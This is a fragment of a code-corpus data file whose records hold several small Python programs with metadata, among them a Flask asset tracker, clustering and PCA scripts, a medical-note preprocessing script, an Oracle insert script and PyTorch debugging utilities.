"cement.core.controller.expose", "line_number": 38, "usage_type": "call"}, {"api_name": "cement.core.controller.expose", "line_number": 42, "usage_type": "call"}, {"api_name": "cement.core.foundation.CementApp", "line_number": 47, "usage_type": "name"}, {"api_name": "cement.ext.ext_colorlog.ColorLogHandler", "line_number": 51, "usage_type": "call"}]}
+{"seq_id": "577740398", "text": "# coding=utf-8\n\nfrom typing import Union\n\n\nclass Human(object):\n\tdef __init__(name, surname, sex=None, *args, **kwargs) -> None:\n\t\tsuper().__init__(name, surname, *args, **kwargs)\n\t\tself._name = name\n\t\tself._surname = _surname\n\t\tself._parents = []\n\t\tself._sex = sex\n\n\t@property\n\tdef parents(self) -> Union[Human]:\n\t\treturn self._parents\n\n\t@property\n\tdef name(self) -> str:\n\t\treturn self._name\n\n\t@property\t\n\tdef is_intact_family() -> bool: \n\t\tif len(self.parents) == 2:\n\t\t\treturn True\n\t\treturn False\n\n\t@property\t\n\tdef parent_names() -> Union[str]:\n\t\tnames = []\n\t\tfor parent in parents:\n\t\t\tnames.append(parent._name)\n\t\treturn names\n\n\n\ndef get_public_methods(type_):\n\t\"\"\"\n\tПолучение публичных аттрибутов\t\n\t\"\"\"\n\treturn [\n\t\tprint('{}.{}()'.format(type_.__name__, i)) # форматириуем строку\n\t\tfor i in dir(type_) if not i.startswith('__')\n\t]\n\n\nif __name__ == '__main__':\n\tif get_public_methods(int) == [] and \\\n\t\tget_public_methods(float) == []:\n\t\tprint('Impossible')\n", "sub_path": "python_examples/syntax_example.py", "file_name": "syntax_example.py", "file_ext": "py", "file_size_in_byte": 1008, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "typing.Union", "line_number": 15, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 29, "usage_type": "name"}]}
+{"seq_id": "325982696", "text": "import os\nfrom flask import Flask, render_template, url_for, request, redirect\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_migrate import Migrate\nfrom forms import AddForm\n\napp = Flask(__name__)\n\nbasedir = os.path.abspath(os.path.dirname(__file__))\n\napp.config['SECRET_KEY'] = 'My top secret'\napp.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///' + os.path.join(basedir, 'data.sqlite')\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\ndb = SQLAlchemy(app)\nMigrate(app,db)\n\n\n\nclass Asset(db.Model):\n __tablename__= 'asset'\n id=db.Column(db.Integer, primary_key=True)\n type = db.Column(db.Text)\n serial_number = db.Column(db.Text)\n asset_number = db.Column(db.Text)\n BU = db.Column(db.Text)\n BL = db.Column(db.Text)\n cost = db.Column(db.Float)\n\n def __init__(self,type,serial_number,asset_number,BU,BL,cost):\n self.type=type\n self.serial_number=serial_number\n self.asset_number=asset_number\n self.BU=BU\n self.BL=BL\n self.cost=cost\n\n def __repr__(self):\n return f'Asset type: {self.type} Serial Number: {self.serial_number}'\n\n@app.route(\"/\")\ndef home():\n # return \"Hello, Flask!\"\n return render_template('index.html')\n\n# Add a new asset and commit to databse\n@app.route('/add', methods=['GET', 'POST'])\ndef add_asset():\n form=AddForm()\n # if form.is_valid():\n if form.validate_on_submit():\n type = form.type.data\n asset_number = form.asset_number.data\n serial_number = form.serial_number.data\n BU = form.BU.data\n BL = form.BL.data\n cost = form.cost.data\n new_asset = Asset(type,asset_number,serial_number,BL,BU,cost)\n db.session.add(new_asset)\n db.session.commit()\n return redirect(url_for('list_asset'))\n return render_template('add.html', form=form)\n\n\n@app.route('/list')\ndef list_asset():\n asset = Asset.query.all()\n return render_template('list_asset.html', asset=asset)\n\n\nif __name__ == \"__main__\":\n app.run(debug=True)\n\n", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 2010, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "flask.Flask", "line_number": 7, "usage_type": "call"}, {"api_name": "os.path.abspath", "line_number": 9, "usage_type": "call"}, {"api_name": "os.path", "line_number": 9, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 9, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 12, "usage_type": "call"}, {"api_name": "os.path", "line_number": 12, "usage_type": "attribute"}, {"api_name": "flask_sqlalchemy.SQLAlchemy", "line_number": 14, "usage_type": "call"}, {"api_name": "flask_migrate.Migrate", "line_number": 15, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 43, "usage_type": "call"}, {"api_name": "forms.AddForm", "line_number": 48, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 60, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 60, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 61, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 67, "usage_type": "call"}]}
+{"seq_id": "312037878", "text": "import matplotlib.pyplot as plt\nimport numpy as np\n\nfrom PIL import Image, ImageDraw, ImageFile\n\n\n\n\nimg = Image.open('euler.jpg')\n\n#img = img.resize()\n#print(img.size)\n\nsq_size = 100\n\nsq_pos = np.array([250, 100])\n\nmove_pos = 200 + sq_pos\n\nimg_np = np.asarray(img)\n\n#print(img_np.shape)\n\nsq_copy = img_np[sq_pos[0]:sq_pos[0]+sq_size, sq_pos[1]:sq_pos[1]+sq_size]\n\nsq_col = sq_copy.mean(axis=(0,1))\n\nprint(sq_copy.shape)\n\nimg_np.setflags(write=1)\nprint(img_np.flags)\n\nimg_np[move_pos[0]:move_pos[0]+sq_size, move_pos[1]:move_pos[1]+sq_size, :] = sq_copy\n\n\nimg = Image.fromarray(img_np)\n\nimg.show()\nexit()\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n#\n", "sub_path": "test_smear.py", "file_name": "test_smear.py", "file_ext": "py", "file_size_in_byte": 623, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "PIL.Image.open", "line_number": 9, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 9, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 16, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 20, "usage_type": "call"}, {"api_name": "PIL.Image.fromarray", "line_number": 36, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 36, "usage_type": "name"}]}
+{"seq_id": "159869232", "text": "import io\nimport json\n\nfrom chaoslib import Configuration, Secrets\n\nfrom chaosazure.machine.constants import RES_TYPE_VM\nfrom chaosazure.cli.runner import execute\nfrom chaosazure.cli.graph_query import filter_type_command\n\n\ndef pick_machines(configuration: Configuration, secrets: Secrets, filter: str):\n command = filter_type_command(RES_TYPE_VM, filter)\n result_json = __fetch_result(command, configuration, secrets)\n machines = __parse_result(result_json)\n\n return machines\n\n\n###############################################################################\n# Private helper functions\n###############################################################################\ndef __fetch_result(command, configuration, secrets):\n\n f = io.StringIO(\"\")\n execute(configuration, secrets, command, f)\n result_json = json.loads(f.getvalue())\n f.close()\n\n return result_json\n\n\ndef __parse_result(result_json):\n\n machines = []\n for elem in result_json:\n m = {\n 'name': elem['name'],\n 'resourceGroup': elem['resourceGroup']\n }\n machines.append(m)\n\n return machines\n", "sub_path": "chaosazure/machine/picker.py", "file_name": "picker.py", "file_ext": "py", "file_size_in_byte": 1125, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "chaoslib.Configuration", "line_number": 11, "usage_type": "name"}, {"api_name": "chaoslib.Secrets", "line_number": 11, "usage_type": "name"}, {"api_name": "chaosazure.cli.graph_query.filter_type_command", "line_number": 12, "usage_type": "call"}, {"api_name": "chaosazure.machine.constants.RES_TYPE_VM", "line_number": 12, "usage_type": "argument"}, {"api_name": "io.StringIO", "line_number": 24, "usage_type": "call"}, {"api_name": "chaosazure.cli.runner.execute", "line_number": 25, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 26, "usage_type": "call"}]}
+{"seq_id": "483373644", "text": "import sklearn.datasets as data\nfrom sklearn.cluster import KMeans\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.decomposition import PCA\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport numpy as np\nimport random as rd\n\n#USE GAUSSIAN MIXTURE MODEL\n\n\ndef makeData(n, std):\n X1 = data.make_blobs(n_samples=n, centers=1, n_features=3, cluster_std=std, center_box=(0, 0))\n df = pd.DataFrame(np.hstack([np.array(X1[0]), np.zeros(np.array(X1[0]).shape)]))\n df['labels'] = np.ones(n)\n X2 = data.make_blobs(n_samples=n, centers=1, n_features=3, cluster_std=std, center_box=(0, 0))\n dftmp = pd.DataFrame(np.hstack([np.zeros(np.array(X1[0]).shape), np.array(X2[0])]))\n dftmp['labels'] = np.ones(n)*2\n return df.append(dftmp, ignore_index=True)\n\ndef cluster_KMeans(df, k): #Hanterar dataframe\n\n labelsArray = []\n oldLabels = list(df['labels'])\n data = df.drop('labels', axis=1)\n data = data.values\n\n X = StandardScaler().fit_transform(data)\n print('Executing K-Means clustering on ' + str(len(data[:, 0])) + ' points.')\n print('Looking for k=' + str(k) + ' clusters.')\n print()\n\n # Clustering\n km = KMeans(n_clusters=k, random_state=0, init = 'k-means++').fit(X)\n labels = km.labels_\n n_clusters = len(set(labels))\n print(str(n_clusters) + \" clusters found.\")\n\n for i in range(0,len(km.labels_)):\n labelsArray.append('Cluster '+str(km.labels_[i] + 1))\n\n dfNew = pd.DataFrame(data=data)\n\n dfNew['labels']=labelsArray\n\n for i in range(0, n_clusters, 1):\n print('#Points in cluster ' + str(i+1) + ': ' + str(len(dfNew.loc[dfNew['labels'] == 'Cluster '+str(i+1)]))+'.')\n dfNew['oldLabels'] = oldLabels\n\n return dfNew\n\n\ndef getPCs(df, n_components):\n\n labels = list(df['labels'])\n data = df.drop('labels', axis=1)\n if 'oldLabels' in df.columns:\n oldLabels = list(df['oldLabels'])\n data = data.drop('oldLabels', axis=1)\n\n tmp = data.values\n standard = StandardScaler()\n tmpS = standard.fit_transform(tmp)\n data = pd.DataFrame(tmpS)\n\n pca = PCA(n_components=n_components)\n pca.fit(data)\n columns = ['PC %i' % i for i in range(1,n_components+1)]\n df_pca = pd.DataFrame(pca.transform(data), columns=columns, index=df.index)\n\n df_pca['labels'] = labels\n if 'oldLabels' in df.columns:\n df_pca['oldLabels'] = oldLabels\n\n return df_pca\n\n\ndf = makeData(100, 1)\ndf_cl = cluster_KMeans(df, 2)\ndf_pca = getPCs(df_cl, 2)\n\nplt.scatter(df_pca['PC 1'], df_pca['PC 2'])\n\nax1 = plt.subplot(1,2,1)\ndf_pca[df_pca['oldLabels']==1].plot.scatter(x='PC 1', y='PC 2', color='DarkGreen', marker='o', label='Cluster 1', ax = ax1)\ndf_pca[df_pca['oldLabels']==2].plot.scatter(x='PC 1', y='PC 2', color='blue', marker='>', label='Cluster 2', ax = ax1)\nplt.xlabel('PC 1', fontsize = 14)\nplt.ylabel('PC 2', fontsize = 14)\nplt.title('True data', fontsize = 14)\n\nax2 = plt.subplot(1,2,2)\ndf_pca[df_pca['labels']=='Cluster 1'].plot.scatter(x='PC 1', y='PC 2', color='DarkGreen', marker='o', label='Cluster 1', ax = ax2)\ndf_pca[df_pca['labels']=='Cluster 2'].plot.scatter(x='PC 1', y='PC 2', color='blue', marker='>', label='Cluster 2', ax = ax2)\nplt.xlabel('PC 1', fontsize = 14)\nplt.ylabel('PC 2', fontsize = 14)\nplt.title('K-Means clustering', fontsize = 14)\n\nplt.show()", "sub_path": "Main2.py", "file_name": "Main2.py", "file_ext": "py", "file_size_in_byte": 3306, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "sklearn.datasets.make_blobs", "line_number": 14, "usage_type": "call"}, {"api_name": "sklearn.datasets", "line_number": 14, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 15, "usage_type": "call"}, {"api_name": "numpy.hstack", "line_number": 15, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 15, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 15, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 16, "usage_type": "call"}, {"api_name": "sklearn.datasets.make_blobs", "line_number": 17, "usage_type": "call"}, {"api_name": "sklearn.datasets", "line_number": 17, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 18, "usage_type": "call"}, {"api_name": "numpy.hstack", "line_number": 18, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 18, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 18, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 19, "usage_type": "call"}, {"api_name": "sklearn.datasets", "line_number": 26, "usage_type": "name"}, {"api_name": "sklearn.datasets", "line_number": 27, "usage_type": "name"}, {"api_name": "sklearn.datasets.values", "line_number": 27, "usage_type": "attribute"}, {"api_name": "sklearn.datasets", "line_number": 29, "usage_type": "argument"}, {"api_name": "sklearn.preprocessing.StandardScaler", "line_number": 29, "usage_type": "call"}, {"api_name": "sklearn.datasets", "line_number": 30, "usage_type": "name"}, {"api_name": "sklearn.cluster.KMeans", "line_number": 35, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 43, "usage_type": "call"}, {"api_name": "sklearn.datasets", "line_number": 43, "usage_type": "name"}, {"api_name": "sklearn.datasets", "line_number": 57, "usage_type": "name"}, {"api_name": "sklearn.datasets", "line_number": 60, "usage_type": "name"}, {"api_name": "sklearn.datasets.drop", "line_number": 60, "usage_type": "call"}, {"api_name": "sklearn.datasets.values", "line_number": 62, "usage_type": "attribute"}, {"api_name": "sklearn.datasets", "line_number": 62, "usage_type": "name"}, {"api_name": "sklearn.preprocessing.StandardScaler", "line_number": 63, "usage_type": "call"}, {"api_name": "sklearn.datasets", "line_number": 65, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 65, "usage_type": "call"}, {"api_name": "sklearn.decomposition.PCA", "line_number": 67, "usage_type": "call"}, {"api_name": "sklearn.datasets", "line_number": 68, "usage_type": "argument"}, {"api_name": "pandas.DataFrame", "line_number": 70, "usage_type": "call"}, {"api_name": "sklearn.datasets", "line_number": 70, "usage_type": "argument"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 83, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 83, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 85, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 85, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 88, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 88, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 89, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 89, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 90, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 90, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 92, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 92, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 95, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 95, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 96, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 96, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 97, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 97, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 99, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 99, "usage_type": "name"}]}
+{"seq_id": "629707063", "text": "import pandas as pd\nimport os\nimport numpy as np\nfrom tqdm import tqdm\nfrom loader import check_sys_path\nfrom sklearn.feature_extraction.text import CountVectorizer\nimport argparse\nimport re\n\nNOTES_COL = [\"allergy\", \"chief complaint\", \"history of present illness\", \"past medical history\", \"past procedure\",\n \"social history\", \"family history\", \"initial exam\", \"admission medications\", \"pertinent results\"]\nMEDICINE_COL = [\"metoprolol\", \"furosemide\", \"lisinopril\", \"amlodipine\", \"atenolol\", \"hydrochlorothiazide\", \"diltiazem\",\n \"carvedilol\"]\n\nparser = argparse.ArgumentParser(description='embedding model')\nparser.add_argument('--min_freq', default=10, type=int, help='learning rate') # wrong descriptions?\nparser.add_argument('--max_df', default=1, type=float, help='batch size') # wrong descriptions?\nargs = parser.parse_args()\n\nif __name__ == '__main__':\n # read data\n df = pd.read_csv(os.path.join(check_sys_path(), \"discharge_notes_with_medication.csv\"))\n df = df[df[\"admission_notes\"].notna()]\n\n print(\"cleaning word...\")\n # discharge_notes = df[\"discharge_notes\"][train_idx].fillna(\"\").tolist()\n admission_notes = df[\"admission_notes\"].dropna().tolist()\n for i in range(len(admission_notes)):\n admission_notes[i] = re.sub(r\"\\d\\. \", \" ordernum \", admission_notes[i])\n admission_notes[i] = re.sub(r\"\\d\\d:\\d\\d\", \" hourtime \", admission_notes[i])\n admission_notes[i] = re.sub(r\"\\d+\", \" num \", admission_notes[i])\n admission_notes[i] = re.sub(\"_\", \" \", admission_notes[i])\n admission_notes[i] = re.sub(r\"\\. \", \" eos \", admission_notes[i])\n\n print(\"training nlp model...\")\n vectorizer = CountVectorizer(min_df=args.min_freq,\n stop_words=\"english\",\n max_df=args.max_df)\n vectorizer.fit(admission_notes)\n # vectorizer.fit(discharge_notes)\n\n word2idx = vectorizer.vocabulary_\n idx2word = [word for word, idx in word2idx.items()]\n vocab = word2idx.keys()\n # reserve 0 for padding value\n idx2word.append(idx2word[0])\n word2idx[idx2word[0]] = len(word2idx) + 1\n idx2word[0] = \" \"\n word2idx[\" \"] = 0\n\n freq_stop_words = vectorizer.stop_words_\n tokenizer = vectorizer.build_tokenizer()\n\n # transform word to idx\n print(\"transforming word to idx...\")\n # discharge_notes_idx = np.array([np.array([word2idx[token] for token in tokenizer(note) if token in vocab])\n # for note in tqdm(discharge_notes)])\n admission_notes_idx = np.array([np.array([word2idx[token] for token in tokenizer(note) if token in vocab])\n for note in admission_notes])\n\n notnan_indices = np.array([i for i, note in enumerate(admission_notes_idx) if note.shape[0] > 0])\n df = df.iloc[notnan_indices, :].reset_index()\n admission_notes_idx = admission_notes_idx[notnan_indices]\n\n # set random indexing for splitting training and validation data\n print(\"random splitting data into training and validation data set...\")\n random_idx = np.random.permutation(np.arange(admission_notes_idx.shape[0]))\n train_idx = random_idx[0:int(0.8 * len(random_idx))] # select first 80% as training data\n val_idx = random_idx[int(0.8 * len(random_idx)):int(0.9 * len(random_idx))] # random select 10% as validation data\n test_idx = random_idx[int(0.9 * len(random_idx)):-1] # random select 10% as test data\n\n # calculate relative freq for each label\n print(\"relative freq for each label in training data\")\n\n\n def stat(file, idx, label):\n file.write(label + \"\\n\")\n freq = df.iloc[idx, -8:].sum() / idx.shape[0]\n medicines = list(df.columns[-8:])\n for i, medicine in enumerate(medicines):\n f.write(\"%s:%.2f(%d)\\n\" % (medicine, freq[i], df.iloc[train_idx, -8 + i].sum()))\n f.write(\"total: %d\" % train_idx.shape[0])\n\n\n with open(\"data_stat.txt\", \"w\") as f:\n stat(f, train_idx, \"train\")\n stat(f, val_idx, \"val\")\n stat(f, test_idx, \"test\")\n\n # np.save(os.path.join(check_sys_path(), \"embedding_train_idx.npy\"), discharge_notes_idx)\n np.save(os.path.join(check_sys_path(), \"train_idx.npy\"), admission_notes_idx[train_idx])\n np.save(os.path.join(check_sys_path(), \"train_label.npy\"), np.array(df.loc[train_idx, MEDICINE_COL]))\n np.save(os.path.join(check_sys_path(), \"val_idx.npy\"), admission_notes_idx[val_idx])\n np.save(os.path.join(check_sys_path(), \"val_label.npy\"), np.array(df.loc[val_idx, MEDICINE_COL]))\n np.save(os.path.join(check_sys_path(), \"test_idx.npy\"), admission_notes_idx[test_idx])\n np.save(os.path.join(check_sys_path(), \"test_label.npy\"), np.array(df.loc[test_idx, MEDICINE_COL]))\n\n # save dict\n with open(os.path.join(check_sys_path(), \"word2idx.txt\"), \"w\") as f:\n f.write(\"\\n\".join([\"%s:%d\" % (word, idx) for word, idx in word2idx.items()]))\n with open(os.path.join(check_sys_path(), \"med2idx.txt\"), \"w\") as f:\n for idx, medicine in enumerate(MEDICINE_COL):\n f.write(\"%s:%s\\n\" % (medicine, idx))\n", "sub_path": "Baseline/preprocess.py", "file_name": "preprocess.py", "file_ext": "py", "file_size_in_byte": 5086, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 15, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 22, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 22, "usage_type": "call"}, {"api_name": "os.path", "line_number": 22, "usage_type": "attribute"}, {"api_name": "loader.check_sys_path", "line_number": 22, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 29, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 30, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 31, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 32, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 33, "usage_type": "call"}, {"api_name": "sklearn.feature_extraction.text.CountVectorizer", "line_number": 36, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 58, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 61, "usage_type": "call"}, {"api_name": "numpy.random.permutation", "line_number": 67, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 67, "usage_type": "attribute"}, {"api_name": "numpy.arange", "line_number": 67, "usage_type": "call"}, {"api_name": "numpy.save", "line_number": 91, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 91, "usage_type": "call"}, {"api_name": "os.path", "line_number": 91, "usage_type": "attribute"}, {"api_name": "loader.check_sys_path", "line_number": 91, "usage_type": "call"}, {"api_name": "numpy.save", "line_number": 92, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 92, "usage_type": "call"}, {"api_name": "os.path", "line_number": 92, "usage_type": "attribute"}, {"api_name": "loader.check_sys_path", "line_number": 92, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 92, "usage_type": "call"}, {"api_name": "numpy.save", "line_number": 93, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 93, "usage_type": "call"}, {"api_name": "os.path", "line_number": 93, "usage_type": "attribute"}, {"api_name": "loader.check_sys_path", "line_number": 93, "usage_type": "call"}, {"api_name": "numpy.save", "line_number": 94, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 94, "usage_type": "call"}, {"api_name": "os.path", "line_number": 94, "usage_type": "attribute"}, {"api_name": "loader.check_sys_path", "line_number": 94, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 94, "usage_type": "call"}, {"api_name": "numpy.save", "line_number": 95, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 95, "usage_type": "call"}, {"api_name": "os.path", "line_number": 95, "usage_type": "attribute"}, {"api_name": "loader.check_sys_path", "line_number": 95, "usage_type": "call"}, {"api_name": "numpy.save", "line_number": 96, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 96, "usage_type": "call"}, {"api_name": "os.path", "line_number": 96, "usage_type": "attribute"}, {"api_name": "loader.check_sys_path", "line_number": 96, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 96, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 99, "usage_type": "call"}, {"api_name": "os.path", "line_number": 99, "usage_type": "attribute"}, {"api_name": "loader.check_sys_path", "line_number": 99, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 101, "usage_type": "call"}, {"api_name": "os.path", "line_number": 101, "usage_type": "attribute"}, {"api_name": "loader.check_sys_path", "line_number": 101, "usage_type": "call"}]}
+{"seq_id": "558764639", "text": "from __future__ import print_function\nimport cx_Oracle\n\ncon = cx_Oracle.connect('hr/hr@127.0.0.1/orcl')\n\n#\n# db=my.connect(host=\"localhost\",\n# user=\"saurabh\",\n# passwd=\"saurabh\",\n# db=\"test\"\n# )\n\nid=[1,2,3]\nname=['a','b','c']\nplace=['dewas','indore','ujjain']\n\nl=[{'price': ' 18000', 'heading': '1 BHK, Residential Apartment for rent in Kadubeesanahalli', 'super_buildup': '600 Sq.Ft. '}, {'price': ' 11000', 'heading': '1 Bedroom, Independent House/Villa for rent in Kaverappa Layout', 'super_buildup': '600 Sq.Ft. '}, {'price': ' 8500', 'heading': '1 BHK, Residential Apartment for rent in Kadubeesanahalli', 'super_buildup': '600 Sq.Ft. '}, {'price': ' 13000', 'heading': '1 Bedroom, Independent House/Villa for rent in Kadubeesanahalli', 'super_buildup': '1200 Sq.Ft. '}, {'price': ' 35000', 'heading': '2 BHK, Residential Apartment for rent in Kaverappa Layout', 'super_buildup': '1400 Sq.Ft. '}]\n\n\nlist=[]\nfor i in range(0,id.__len__()):\n list.append([id[i],name[i],place[i]])\n\nprint(list)\nprint(l.__len__())\n\n\n\n# # Connect mysql server\n# cursor = db.cursor()\n# sql = \"insert into test3(id,a,b)VALUES(%s,%s,%s)\"\n# number_of_rows = cursor.executemany(sql,list)\n# db.commit()\n#\n# db.close()\n\ncur = con.cursor()\ncur.bindarraysize = 7\ncur.setinputsizes(int, 20)\ncur.executemany(\"insert into test3(id,name,place) values (:1, :2,:3)\", list)\n\ncon.commit()\n\n# cur = con.cursor()\n# cur.bindarraysize = 7\n# cur.setinputsizes(int, 20)\n# for i in range(0,l.__len__()):\n# cur.execute(\"insert into test4(price,heading) values (l[i]['price'],l[i]['heading'])\", list)\n#\n# con.commit()\n\n# Now query the results back\n\n# cur2 = con.cursor()\n# cur2.execute('select * from test3')\n# res = cur2.fetchall()\n# print(res)\n#\n# cur.close()\n# cur2.close()\ncon.close()\n", "sub_path": "practice/database_con_read.py", "file_name": "database_con_read.py", "file_ext": "py", "file_size_in_byte": 1753, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "cx_Oracle.connect", "line_number": 4, "usage_type": "call"}]}
+{"seq_id": "339619873", "text": "# Third Party\nimport numpy as np\nimport torch\n\n# First Party\nfrom smdebug.core.reduction_config import ALLOWED_NORMS, ALLOWED_REDUCTIONS\nfrom smdebug.core.reductions import get_numpy_reduction\n\n\ndef get_reduction_of_data(reduction_name, tensor_data, tensor_name, abs=False):\n if isinstance(tensor_data, np.ndarray):\n return get_numpy_reduction(reduction_name, tensor_data, abs)\n if abs:\n tensor_data = torch.abs(tensor_data)\n\n if reduction_name in ALLOWED_REDUCTIONS:\n if reduction_name == \"variance\":\n reduction_name = \"var\"\n assert hasattr(torch.Tensor, reduction_name)\n f = getattr(torch.Tensor, reduction_name)\n op = f(tensor_data)\n return op\n elif reduction_name in ALLOWED_NORMS:\n if reduction_name in [\"l1\", \"l2\"]:\n ord = int(reduction_name[1])\n else:\n raise RuntimeError(\n \"Invalid normalization operation {0} for torch.Tensor\".format(reduction_name)\n )\n op = torch.norm(tensor_data, p=ord)\n return op\n elif hasattr(torch, reduction_name):\n f = getattr(torch, reduction_name)\n op = f(tensor_data)\n return op\n raise RuntimeError(\"Invalid reduction_name {0}\".format(reduction_name))\n\n\ndef make_numpy_array(x):\n if isinstance(x, np.ndarray):\n return x\n elif np.isscalar(x):\n return np.array([x])\n elif isinstance(x, torch.Tensor):\n return x.to(torch.device(\"cpu\")).data.numpy()\n elif isinstance(x, tuple):\n return np.asarray(x, dtype=x.dtype)\n else:\n raise TypeError(\n \"_make_numpy_array only accepts input types of numpy.ndarray, scalar,\"\n \" and Torch Tensor, while received type {}\".format(str(type(x)))\n )\n", "sub_path": "smdebug/pytorch/utils.py", "file_name": "utils.py", "file_ext": "py", "file_size_in_byte": 1768, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "numpy.ndarray", "line_number": 11, "usage_type": "attribute"}, {"api_name": "smdebug.core.reductions.get_numpy_reduction", "line_number": 12, "usage_type": "call"}, {"api_name": "torch.abs", "line_number": 14, "usage_type": "call"}, {"api_name": "smdebug.core.reduction_config.ALLOWED_REDUCTIONS", "line_number": 16, "usage_type": "name"}, {"api_name": "torch.Tensor", "line_number": 19, "usage_type": "attribute"}, {"api_name": "torch.Tensor", "line_number": 20, "usage_type": "attribute"}, {"api_name": "smdebug.core.reduction_config.ALLOWED_NORMS", "line_number": 23, "usage_type": "name"}, {"api_name": "torch.norm", "line_number": 30, "usage_type": "call"}, {"api_name": "numpy.ndarray", "line_number": 40, "usage_type": "attribute"}, {"api_name": "numpy.isscalar", "line_number": 42, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 43, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 44, "usage_type": "attribute"}, {"api_name": "torch.device", "line_number": 45, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 47, "usage_type": "call"}]}
